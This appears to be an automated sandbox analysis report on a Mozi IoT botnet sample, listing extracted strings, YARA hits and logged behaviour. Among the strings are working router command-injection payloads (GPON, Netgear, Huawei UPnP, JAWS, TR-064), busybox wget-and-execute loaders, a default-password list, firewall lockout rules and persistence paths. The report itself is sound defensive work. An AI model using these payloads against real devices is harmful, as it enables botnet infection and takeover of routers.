77 4e 54 56 41 51 44 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 77 41 41 52 43 41 44 43 41 4d 67 44 41 53 49 41 41 68 45 42 41 78 45 42 2f 38 51 41 47 77 41 41 41 51 55 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 44 42 41 55 47 41 51 66 2f 78 41 42 4a 45 41 41 43 41 51 4d 43 41 77 51 47 43 41 49 48 42 67 55 46 41 41 41 42 41 67 4d 41 42 42 45 46 45 69 45 78 51 52 4d 69 55 57 45 47 4d 6c 4a 78 63 6f 45 55 49 30 4b 52 6f

Urls found in memory or binary data

Source: i	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: i	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: i	String found in binary or memory: http://%s:%d/Mozi.m
Source: i	String found in binary or memory: http://%s:%d/Mozi.m;
Source: i	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: i	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: i	String found in binary or memory: http://%s:%d/bin.sh
Source: i	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: i	String found in binary or memory: http://127.0.0.1
Source: i	String found in binary or memory: http://127.0.0.1sendcmd
Source: i	String found in binary or memory: http://HTTP/1.1
Source: i	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.6.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: i	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: i	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: i	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: i	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: i	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.6.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk

Source: /tmp/i (PID: 4562)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

System Summary:

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Sample contains strings indicative of password brute-forcing capabilities

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: POST /cdn-cgi/
Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample	Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample	Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample	Potential command found: mount -o remount,rw /overlay /
Source: Initial sample	Potential command found: mv -f %s %s
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: killall -9 %s
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample	Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample	Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Yara signature match

Source: i, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Classification label

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4613)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4662)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4675)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4710)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4714)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4787)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4860)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4878)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4897)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4909)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4940)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4959)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4994)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5012)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5028)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5050)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5062)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5091)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5100)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5140)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5164)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5183)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5189)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5240)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5243)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5249)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5282)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5315)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT			Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/i (PID: 4562)

File: /proc/4562/mounts

Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/i (PID: 4562)	File: /etc/profile.d/cedilla-portuguese.sh			Jump to behavior
Source: /tmp/i (PID: 4562)	File: /etc/profile.d/apps-bin-path.sh			Jump to behavior
Source: /tmp/i (PID: 4562)	File: /etc/profile.d/Z97-byobu.sh			Jump to behavior
Source: /tmp/i (PID: 4562)	File: /etc/profile.d/bash_completion.sh			Jump to behavior
Source: /tmp/i (PID: 4562)	File: /etc/profile.d/vte-2.91.sh			Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/i (PID: 4562)	File: /etc/rcS.d/S95baby.sh			Jump to behavior
Source: /tmp/i (PID: 4562)	File: /etc/rc.local			Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 4566)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Jump to behavior

Enumerates processes within the "proc" file system

Source: /usr/bin/killall (PID: 4566)	File opened: /proc/230/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/231/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/232/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/233/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/234/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3512/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/359/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1452/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3632/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3518/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/10/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1339/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/11/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/12/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/13/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/14/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/15/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/16/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/17/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/18/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/19/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/483/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3527/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3527/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/2/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3525/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1346/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3524/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3524/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/4/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3523/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/5/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/7/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/8/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/9/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/20/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/21/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/22/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/23/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/24/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/25/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/28/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/29/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1363/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3541/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3541/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1362/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/496/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/496/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/30/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/31/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/31/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1119/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3790/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3791/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3310/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3431/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3431/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3550/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/260/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/263/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/264/stat			Jump to behavior
